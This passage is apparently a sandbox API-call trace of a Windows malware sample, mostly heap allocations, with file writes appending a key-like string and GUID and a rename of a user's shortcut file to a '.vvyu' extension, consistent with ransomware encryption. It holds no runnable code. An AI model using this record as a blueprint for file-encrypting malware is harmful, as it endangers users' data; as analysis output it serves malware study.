[0197.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fc0 [0197.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f60 [0197.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0197.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0197.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0197.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f30 [0197.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0197.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0197.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0197.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0197.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0197.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0197.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0197.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0197.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0197.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0197.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0197.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0197.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0197.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0197.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0197.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0197.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0197.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0197.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0197.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0197.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0197.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0197.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0197.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0197.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0197.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0197.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0197.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0197.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0197.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0197.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95140 | out: hHeap=0x620000) returned 1 [0197.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0197.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0197.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0197.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0197.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0197.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0197.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0197.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0197.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0197.055] WriteFile (in: hFile=0x568, lpBuffer=0x661a58*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x661a58*, lpNumberOfBytesWritten=0x312fb14*=0xdd, lpOverlapped=0x0) returned 1 [0197.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x661a58 | out: hHeap=0x620000) returned 1 [0197.055] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.055] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0197.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0197.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0197.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0197.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0197.057] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0197.058] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.058] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.058] CloseHandle (hObject=0x568) returned 1 [0197.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0197.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0197.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0197.060] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\web slice gallery.url.vvyu")) returned 1 [0197.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0197.061] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0197.064] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0197.064] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0197.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0197.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0197.065] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0197.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0197.065] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0197.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0197.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0197.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0197.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0197.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 